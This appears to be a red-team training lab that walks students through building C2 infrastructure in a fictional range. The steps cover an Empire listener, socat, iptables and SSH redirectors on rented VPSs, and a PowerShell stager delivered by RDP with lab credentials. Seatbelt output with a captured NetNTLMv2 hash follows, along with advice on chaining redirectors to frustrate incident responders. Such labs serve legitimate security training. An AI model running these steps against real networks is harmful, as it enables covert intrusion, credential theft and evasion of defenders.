Lab 2.4 : Setting Up Redirectors
Objectives
- Understand the use of redirectors in attack infrastructure
- Create a listener on Empire that will expect redirector routing
- Create stager payloads that will route through the redirector
- Execute the stager payload in the lab environment
This lab will focus on the use of redirectors to create a buffer between the C2 server and the target network. We will create an account on a Virtual Private Server (VPS) vendor and provision two VPS's to redirect traffic through.

TTPs Emulated in this Lab
- T1583 - Acquire Infrastructure
- T1583.003 - Acquire Infrastructure: Virtual Private Server
- T1587 - Develop Capabilities
- T1587.001 - Develop Capabilities: Malware
- T1587.003 - Develop Capabilities: Digital Certificates
- T1588 - Obtain Capabilities
- T1588.002 - Obtain Capabilities: Tool
- T1588.004 - Obtain Capabilities: Digital Certificates
- T1071 - Application Layer Protocol
- T1071.001 - Application Layer Protocol: Web Protocols
- T1132 - Data Encoding
- T1132.001 - Data Encoding: Standard Encoding
- T1573 - Encrypted Channel
- T1059.001 - Command and Scripting Interpreter: Python
- T1204 – User Execution
- T1204.002 - User Execution: Malicious File
- T1480 – Execution Guardrails
Preparation
Preparation Steps
Ensure you are connected to the VPN and can ping from the Slingshot Linux VM to the draconem.io website.
Open a terminal on Slingshot. Connect to the VPN with openvpn and take note of your ip address:
sudo openvpn ~/Desktop/sec565-labs-range.ovpn
Ctrl+Shift+t to open a new terminal tab, then run the following command to create four ICMP packets :
ping -c 4 draconem.io
If you get a successful ping, then curl the website. The ping tests icmp while the curl tests dns, tcp, and http.
curl draconem.io | head

On Your Own
- Create an Empire listener with a Host set to a redirector address
- Create a stager payload
- Execute the stager to create an Agent in the target environment via RDP:
xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp - Ensure communication works properly
- Review the walkthrough
Walkthrough
Warning
Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.
Launch Empire
Warning
If your C2 is still active then delete your listeners and skip down to step 5
1. Launch Empire by starting the server from the command line.
cd /opt/Empire/
sudo ./ps-empire server
2. Start the StarKiller from the terminal. Ctrl+Shift+t to open a new terminal tab.
cd /home/sec565/tools/
./starkiller-1.9.0.AppImage --no-sandbox
3. Log into Starkiller UI
Enter the following values to log into the web user interface:
- Url:
https://localhost:1337 - Username:
empireadmin - Password:
password123 - Check the box "Remember URL and Username"
Click SUBMIT

4. Create certificates for HTTPS, this is optional as Empire normally already has bundled default certificates, but let's do it for good measure. Return to your terminal. Ctrl+Shift+t to open a new terminal tab, then run the cert.sh script.
sudo su
cd /opt/Empire/setup/
./cert.sh
Provision VPS
5. Open a browser to http://vpspawn.com/register and register a new account.

Now log into the site and click the Spawn VPS button twice. This will provision you two VPS's.

Once they are displayed, click the eye icon to see the password's for each. We have the following VPSs we can use for redirection:
4-8-15.vpspawn.comwith credentialsroot:0wnTHEnet!16-23-42.vpspawn.comwith credentialsroot:ONth3NET?

socat Redirection
6. SSH to your new VPS as root and using one of the passwords provided by vpspawn.com. Then create a screen session and run socat using the syntax below:
ssh root@4-8-15.vpspawn.com
ip a
screen -S socat443
socat TCP4-LISTEN:443,fork TCP4:<C2-IP-Address or Hostname>:443
Warning
The IP address or hostname should be the value of your tun0 adapter.
Note
The use of screen is a safety mechanism because we can get back to shell that has our socat process if we get disconnected from our redirector. To detach from the screen session type Ctrl+a then d. To view screen sessions run screen -ls. To reattach to a detached screen run screen -r <screen session name>.
Create Listener
If you still have your HTTPS listener from a previous lab, feel free to skip this step, or delete the old listener and recreate it with the step below
7. Create an Empire listener.
Click the Create button in the upper right corner of the screen.
Select http in the drop down menu. Then provide the following values:
- Name:
interactive-https - Host:
https://10.130.7.5:443<- This must be the ip address or hostname of the redirector - Port:
443 - Bind IP:
0.0.0.0 - StagingKey:
AddSomethingRandomTo32Characters - CertPath:
/opt/Empire/empire/server/data
Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.
Warning
The Host field must have the IP address or hostname of the redirector and not your tun0 adapter. When building a stager this Host value will be used for communication, you do not want your C2 server's address or hostname here.

Create Stager
8. Create an Empire stager. Click on the suitcase icon
on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.
Select multi/launcher in the drop down menu. Then provide the following values:
- StarkillerName:
interactive-https-pwsh - Listener:
interactive-https - Language:
powershell
Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen

Deliver Stager
9. Deliver your stager to windows system. First establish an RDP session to workstation, student, using the credentials student : Sec565!!. We will use xfreerdp on our Slingshot Linux VM with the clipboard plugin so that we can paste our stager into a command prompt.
Warning
We are going to RDP to the target network, consider this a system you control and disregard communication path, opsec, and tradecraft on this system only. For the sake of the lab, we want to provide easy and direct access to a system for learning purposes. In a real engagement you would avoid RDP and if you absolutely must, you should use a proxy for the connection.
xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp
On the Stagers dashboard, click the three vertical dots icon
under actions to bring up the actions menu. Click Copy to Clipboard.

Open a command prompt by clicking the windows icon in the lower left and typing cmd.exe. Then right click in the command prompt. You should see a lot of encoded text. Press Enter to spawn a new agent. The command prompt should close automatically. You may now exit your RDP session.


Agent Interaction
10. Click on the chain icon
on the left navigation window to bring up the Agents dashboard. You may now create tasks to explore the new system. If you look at the VIEW tab of the agent you will see that the External IP is the IP of your redirector while the internal IP is the IP of the host.
11. While we are here, let's run Seatbelt from GhostPack which will allow us to get a lot of information about the user and host on this system. We will discuss Post Exploitation and the use of tools like Seatbelt in Section 3 of SEC565. Provide the following values on the INTERACT tab of the agent:
- Execute Module:
csharp/GhostPack/Seatbelt - DotNetVersion:
Net35 - Command:
-group=user
Click SUBMIT

Seatbelt Output
(empireadmin) /opt/Empire/empire/server/csharp/Covenant/Data/Tasks/CSharp/Compiled/net35/Seatbelt_Zc6Tp.compiled|,
%&&@@@&&
&&&&&&&%%%, #&&@@@@@@%%%%%%###############%
&%& %&%% &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####% &%%**# @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%####### %&%,,,,,,,,,,,,,,,, @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%####### %%%,,,,,, ,,. ,, @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%#################### &%%...... ... .. @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%######### %%%...... ... .. @////(((&%%%%%#########################(#(#######((#####
###%##%%#################### &%%............... @////(((&%%%%%%%%##############%#######(#########((#####
#####%###################### %%%.. @////(((&%%%%%%%################
&%& %%%%% Seatbelt %////(((&%%%%%%%%#############*
&%%&&&%%%%% v1.1.1 ,(((&%%%%%%%%%%%%%%%%%,
#%%%%##,
====== Certificates ======
====== CertificateThumbprints ======
CurrentUser\Root - F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE (Amazon Root CA 4) 5/26/2040 12:00:00 AM
CurrentUser\Root - 92B46C76E13054E104F230517E6E504D43AB10B5 (Symantec Enterprise Mobile Root for Microsoft) 3/14/2032 11:59:59 PM
CurrentUser\Root - 925A8F8D2C6D04E0665F596AFF22D863E8256F3F (Starfield Services Root Certificate Authority - G2) 12/31/2037 11:59:59 PM
CurrentUser\Root - 8F43288AD272F3103B6FB1428485EA3014C0BCFE (Microsoft Root Certificate Authority 2011) 3/22/2036 10:13:04 PM
CurrentUser\Root - 8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16 (Amazon Root CA 1) 1/17/2038 12:00:00 AM
CurrentUser\Root - 5A8CEF45D7A69859767A8C8B4496B578CF474B1A (Amazon Root CA 2) 5/26/2040 12:00:00 AM
CurrentUser\Root - 3B1EFD3A66EA28B16697394703A72CA340A05BD5 (Microsoft Root Certificate Authority 2010) 6/23/2035 10:04:01 PM
CurrentUser\Root - 31F9FC8BA3805986B721EA7295C65B3A44534274 (Microsoft ECC TS Root Certificate Authority 2018) 2/27/2043 9:00:12 PM
CurrentUser\Root - 0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E (Amazon Root CA 3) 5/26/2040 12:00:00 AM
CurrentUser\Root - 06F1AA330B927B753A40E68CDF22E34BCBEF3352 (Microsoft ECC Product Root Certificate Authority 2018) 2/27/2043 8:50:46 PM
CurrentUser\Root - DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 (DigiCert Global Root G2) 1/15/2038 12:00:00 PM
CurrentUser\Root - DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 (DigiCert Trusted Root G4) 1/15/2038 12:00:00 PM
CurrentUser\Root - D4DE20D05E66FC53FE1A50882C78DB2852CAE474 (Baltimore CyberTrust Root) 5/12/2025 11:59:00 PM
CurrentUser\Root - AD7E1C28B064EF8F6003402014C3D0E3370EB58A (Starfield Class 2 Certification Authority) 6/29/2034 5:39:16 PM
CurrentUser\Root - A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 (DigiCert Global Root CA) 11/10/2031 12:00:00 AM
CurrentUser\Root - 8CF427FD790C3AD166068DE81E57EFBB932272D4 (Entrust Root Certification Authority - G2) 12/7/2030 5:55:54 PM
CurrentUser\Root - 742C3192E607E424EB4549542BE1BBC53E6174E2 (Class 3 Public Primary Certification Authority) 8/1/2028 11:59:59 PM
CurrentUser\Root - 5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 (DigiCert High Assurance EV Root CA) 11/10/2031 12:00:00 AM
CurrentUser\Root - 503006091D97D4F5AE39F7CBE7927D7D652D3431 (Entrust.net Certification Authority (2048)) 7/24/2029 2:15:12 PM
CurrentUser\Root - 3679CA35668772304D30A5FB873B0FA77BB70D54 (VeriSign Universal Root Certification Authority) 12/1/2037 11:59:59 PM
CurrentUser\Root - 2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E (USERTrust RSA Certification Authority) 1/18/2038 11:59:59 PM
CurrentUser\Root - 0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 (DigiCert Assured ID Root CA) 11/10/2031 12:00:00 AM
LocalMachine\Root - F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE (Amazon Root CA 4) 5/26/2040 12:00:00 AM
LocalMachine\Root - 92B46C76E13054E104F230517E6E504D43AB10B5 (Symantec Enterprise Mobile Root for Microsoft) 3/14/2032 11:59:59 PM
LocalMachine\Root - 925A8F8D2C6D04E0665F596AFF22D863E8256F3F (Starfield Services Root Certificate Authority - G2) 12/31/2037 11:59:59 PM
LocalMachine\Root - 8F43288AD272F3103B6FB1428485EA3014C0BCFE (Microsoft Root Certificate Authority 2011) 3/22/2036 10:13:04 PM
LocalMachine\Root - 8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16 (Amazon Root CA 1) 1/17/2038 12:00:00 AM
LocalMachine\Root - 5A8CEF45D7A69859767A8C8B4496B578CF474B1A (Amazon Root CA 2) 5/26/2040 12:00:00 AM
LocalMachine\Root - 3B1EFD3A66EA28B16697394703A72CA340A05BD5 (Microsoft Root Certificate Authority 2010) 6/23/2035 10:04:01 PM
LocalMachine\Root - 31F9FC8BA3805986B721EA7295C65B3A44534274 (Microsoft ECC TS Root Certificate Authority 2018) 2/27/2043 9:00:12 PM
LocalMachine\Root - 0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E (Amazon Root CA 3) 5/26/2040 12:00:00 AM
LocalMachine\Root - 06F1AA330B927B753A40E68CDF22E34BCBEF3352 (Microsoft ECC Product Root Certificate Authority 2018) 2/27/2043 8:50:46 PM
LocalMachine\Root - DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 (DigiCert Global Root G2) 1/15/2038 12:00:00 PM
LocalMachine\Root - DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 (DigiCert Trusted Root G4) 1/15/2038 12:00:00 PM
LocalMachine\Root - D4DE20D05E66FC53FE1A50882C78DB2852CAE474 (Baltimore CyberTrust Root) 5/12/2025 11:59:00 PM
LocalMachine\Root - AD7E1C28B064EF8F6003402014C3D0E3370EB58A (Starfield Class 2 Certification Authority) 6/29/2034 5:39:16 PM
LocalMachine\Root - A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 (DigiCert Global Root CA) 11/10/2031 12:00:00 AM
LocalMachine\Root - 8CF427FD790C3AD166068DE81E57EFBB932272D4 (Entrust Root Certification Authority - G2) 12/7/2030 5:55:54 PM
LocalMachine\Root - 742C3192E607E424EB4549542BE1BBC53E6174E2 (Class 3 Public Primary Certification Authority) 8/1/2028 11:59:59 PM
LocalMachine\Root - 5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 (DigiCert High Assurance EV Root CA) 11/10/2031 12:00:00 AM
LocalMachine\Root - 503006091D97D4F5AE39F7CBE7927D7D652D3431 (Entrust.net Certification Authority (2048)) 7/24/2029 2:15:12 PM
LocalMachine\Root - 3679CA35668772304D30A5FB873B0FA77BB70D54 (VeriSign Universal Root Certification Authority) 12/1/2037 11:59:59 PM
LocalMachine\Root - 2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E (USERTrust RSA Certification Authority) 1/18/2038 11:59:59 PM
LocalMachine\Root - 0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 (DigiCert Assured ID Root CA) 11/10/2031 12:00:00 AM
CurrentUser\CertificateAuthority - FEE449EE0E3965A5246F000E87FDE2A065FD89D4 (Root Agency) 12/31/2039 11:59:59 PM
LocalMachine\CertificateAuthority - FEE449EE0E3965A5246F000E87FDE2A065FD89D4 (Root Agency) 12/31/2039 11:59:59 PM
CurrentUser\AuthRoot - DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 (DigiCert Global Root G2) 1/15/2038 12:00:00 PM
CurrentUser\AuthRoot - DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 (DigiCert Trusted Root G4) 1/15/2038 12:00:00 PM
CurrentUser\AuthRoot - D4DE20D05E66FC53FE1A50882C78DB2852CAE474 (Baltimore CyberTrust Root) 5/12/2025 11:59:00 PM
CurrentUser\AuthRoot - AD7E1C28B064EF8F6003402014C3D0E3370EB58A (Starfield Class 2 Certification Authority) 6/29/2034 5:39:16 PM
CurrentUser\AuthRoot - A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 (DigiCert Global Root CA) 11/10/2031 12:00:00 AM
CurrentUser\AuthRoot - 8CF427FD790C3AD166068DE81E57EFBB932272D4 (Entrust Root Certification Authority - G2) 12/7/2030 5:55:54 PM
CurrentUser\AuthRoot - 742C3192E607E424EB4549542BE1BBC53E6174E2 (Class 3 Public Primary Certification Authority) 8/1/2028 11:59:59 PM
CurrentUser\AuthRoot - 5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 (DigiCert High Assurance EV Root CA) 11/10/2031 12:00:00 AM
CurrentUser\AuthRoot - 503006091D97D4F5AE39F7CBE7927D7D652D3431 (Entrust.net Certification Authority (2048)) 7/24/2029 2:15:12 PM
CurrentUser\AuthRoot - 3679CA35668772304D30A5FB873B0FA77BB70D54 (VeriSign Universal Root Certification Authority) 12/1/2037 11:59:59 PM
CurrentUser\AuthRoot - 2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E (USERTrust RSA Certification Authority) 1/18/2038 11:59:59 PM
CurrentUser\AuthRoot - 0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 (DigiCert Assured ID Root CA) 11/10/2031 12:00:00 AM
LocalMachine\AuthRoot - DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 (DigiCert Global Root G2) 1/15/2038 12:00:00 PM
LocalMachine\AuthRoot - DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 (DigiCert Trusted Root G4) 1/15/2038 12:00:00 PM
LocalMachine\AuthRoot - D4DE20D05E66FC53FE1A50882C78DB2852CAE474 (Baltimore CyberTrust Root) 5/12/2025 11:59:00 PM
LocalMachine\AuthRoot - AD7E1C28B064EF8F6003402014C3D0E3370EB58A (Starfield Class 2 Certification Authority) 6/29/2034 5:39:16 PM
LocalMachine\AuthRoot - A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 (DigiCert Global Root CA) 11/10/2031 12:00:00 AM
LocalMachine\AuthRoot - 8CF427FD790C3AD166068DE81E57EFBB932272D4 (Entrust Root Certification Authority - G2) 12/7/2030 5:55:54 PM
LocalMachine\AuthRoot - 742C3192E607E424EB4549542BE1BBC53E6174E2 (Class 3 Public Primary Certification Authority) 8/1/2028 11:59:59 PM
LocalMachine\AuthRoot - 5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 (DigiCert High Assurance EV Root CA) 11/10/2031 12:00:00 AM
LocalMachine\AuthRoot - 503006091D97D4F5AE39F7CBE7927D7D652D3431 (Entrust.net Certification Authority (2048)) 7/24/2029 2:15:12 PM
LocalMachine\AuthRoot - 3679CA35668772304D30A5FB873B0FA77BB70D54 (VeriSign Universal Root Certification Authority) 12/1/2037 11:59:59 PM
LocalMachine\AuthRoot - 2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E (USERTrust RSA Certification Authority) 1/18/2038 11:59:59 PM
LocalMachine\AuthRoot - 0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 (DigiCert Assured ID Root CA) 11/10/2031 12:00:00 AM
====== ChromiumPresence ======
====== CloudCredentials ======
====== CloudSyncProviders ======
====== CredEnum ======
ERROR: [!] Terminating exception running command 'CredEnum': System.ComponentModel.Win32Exception (0x80004005): Element not found
at Seatbelt.Commands.Windows.CredEnumCommand.<Execute>d__9.MoveNext()
at Seatbelt.Runtime.ExecuteCommand(CommandBase command, String[] commandArgs)
====== dir ======
LastAccess LastWrite Size Path
18-11-14 18-11-14 0B C:\Users\Public\Documents\My Music\
18-11-14 18-11-14 0B C:\Users\Public\Documents\My Pictures\
18-11-14 18-11-14 0B C:\Users\Public\Documents\My Videos\
18-11-14 18-11-14 0B C:\Users\Default\Documents\My Music\
18-11-14 18-11-14 0B C:\Users\Default\Documents\My Pictures\
18-11-14 18-11-14 0B C:\Users\Default\Documents\My Videos\
16-06-21 23-03-29 527B C:\Users\Default\Desktop\EC2 Feedback.website
16-06-21 23-03-29 554B C:\Users\Default\Desktop\EC2 Microsoft Windows Guide.website
====== DpapiMasterKeys ======
Folder : C:\Users\Gareth.Kilgallen\AppData\Roaming\Microsoft\Protect\S-1-5-21-633365672-3027788273-74542043-1196
LastAccessed LastModified FileName
------------ ------------ --------
3/29/2023 9:18:07 AM 3/29/2023 9:18:07 AM 40a14db7-bb75-4028-9d00-14371c9ff21f
[*] Use the Mimikatz "dpapi::masterkey" module with appropriate arguments (/pvk or /rpc) to decrypt
[*] You can also extract many DPAPI masterkeys from memory with the Mimikatz "sekurlsa::dpapi" module
[*] You can also use SharpDPAPI for masterkey retrieval.
====== Dsregcmd ======
ERROR: Unable to collect. No relevant information were returned
====== ExplorerMRUs ======
====== ExplorerRunCommands ======
====== FileZilla ======
====== FirefoxPresence ======
====== IdleTime ======
CurrentUser : DRACONEM\Gareth.Kilgallen
Idletime : 00h:00m:42s:047ms (42047 milliseconds)
====== IEFavorites ======
Favorites (Gareth.Kilgallen):
http://go.microsoft.com/fwlink/p/?LinkId=255142
====== IETabs ======
====== IEUrls ======
Internet Explorer typed URLs for the last 7 days
====== KeePass ======
====== MappedDrives ======
Mapped Drives (via WMI)
====== MTPuTTY ======
====== OfficeMRUs ======
Enumerating Office most recently used files for the last 7 days
App User LastAccess FileName
--- ---- ---------- --------
====== OracleSQLDeveloper ======
====== PowerShellHistory ======
====== PuttyHostKeys ======
====== PuttySessions ======
====== RDCManFiles ======
====== RDPSavedConnections ======
====== SecPackageCreds ======
Version : NetNTLMv2
Hash : Gareth.Kilgallen::DRACONEM:1122334455667788:82af52dc811850288b01fc18cbecd623:0101000000000000353bdeff1f62d9018eb7ebcfa5e2d99900000000080030003000000000000000000000000020000042619247a1d97554ae67802b4a8f011658cf4c9f45b47541d28c7cbfc73bf4360a00100000000000000000000000000000000000090000000000000000000000
====== SlackDownloads ======
====== SlackPresence ======
====== SlackWorkspaces ======
====== SuperPutty ======
====== TokenGroups ======
Current Token's Groups
DRACONEM\Domain Users S-1-5-21-633365672-3027788273-74542043-513
Everyone S-1-1-0
BUILTIN\Users S-1-5-32-545
BUILTIN\Remote Desktop Users S-1-5-32-555
NT AUTHORITY\REMOTE INTERACTIVE LOGON S-1-5-14
NT AUTHORITY\INTERACTIVE S-1-5-4
NT AUTHORITY\Authenticated Users S-1-5-11
NT AUTHORITY\This Organization S-1-5-15
LOCAL S-1-2-0
DRACONEM\Folder Redirection Users S-1-5-21-633365672-3027788273-74542043-1246
DRACONEM\Sales S-1-5-21-633365672-3027788273-74542043-1124
Authentication authority asserted identity S-1-18-1
====== WindowsCredentialFiles ======
====== WindowsVault ======
Vault GUID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Vault Type : Web Credentials
Item count : 0
Vault GUID : 77bc582b-f0a6-4e15-4e80-61736b6f3b29
Vault Type : Windows Credentials
Item count : 0
[*] Completed collection in 0.956 seconds
Now all the C2 traffic is routed through a redirector in gray space. This creates one hop between your C2 server and the target network. If Incident Responders conduct network forensics, they would get the DNS or IP address of the temporary VPS instead of your C2 server. The Blue Team can ask the VPS provider for logs around the time of the incident through Law Enforcement channels or by filling out an Abuse report. With one hop that might be a concern, but redirectors can be chained together to make it more difficult to unravel the whole chain. If chaining redirectors, use different providers in different geographic areas.
Conclusion
In this lab we created an HTTP listener that was configured with X.509 certificates to safeguard our C2 traffic. We then generated a PowerShell stager and delivered it to the windows system in the target environment. For the purposes of the lab, we used direct RDP access to execute our stager code. In a real engagement other delivery methods like phishing would be necessary to get that initial access. Lastly, we were assured that all the communication worked because the Agent was spawned and we could see that the traffic was directed to our C2 through the redirector.
Bonus
iptables
Warning
Remember to kill your socat listener from the previous steps in this lab.
12. Try to establish redirection with iptables on the redirector (not your Slingshot Linux VM). First enable ipv4 forwarding with sysctl net.ipv4.ip_forward=1 and then establish a prerouting rule.
13. Create iptables rules
root@4-8-15:~# sysctl net.ipv4.ip_forward=1
root@4-8-15:~# iptables -I INPUT -p tcp -m tcp --dport 443 -j ACCEPT
root@4-8-15:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination <C2-IP-Address or Hostname>:443
root@4-8-15:~# iptables -t nat -A POSTROUTING -j MASQUERADE
root@4-8-15:~# iptables -I FORWARD -j ACCEPT
root@4-8-15:~# iptables -P FORWARD ACCEPT
root@4-8-15:~# nano /etc/ssh/sshd_config
root@4-8-15:~# service sshd restart or systemctl restart sshd
SSH
14. By default the SSH daemon will not allow remote port forwards to bind to all adapters (0.0.0.0) unless the configuration is set properly. Open the SSH daemon config with vim /etc/ssh/sshd_config or nano /etc/ssh/sshd_config on the redirector. Change the value of GatewayPorts and AllowTcpForwarding to yes.
GatewayPorts yes
AllowTcpForwarding yes
15. Restart the ssh daemon with service sshd restart or systemctl restart sshd for the new configuration to take effect.
16. ssh to the redirector and establish a reverse port forward:
ssh root@4-8-15.vpspawn.com -R 443:localhost:443
We have now opened a listener on port 443 on the redirector, any communication to that port will then be sent through the SSH tunnel to our Slingshot Linux VM.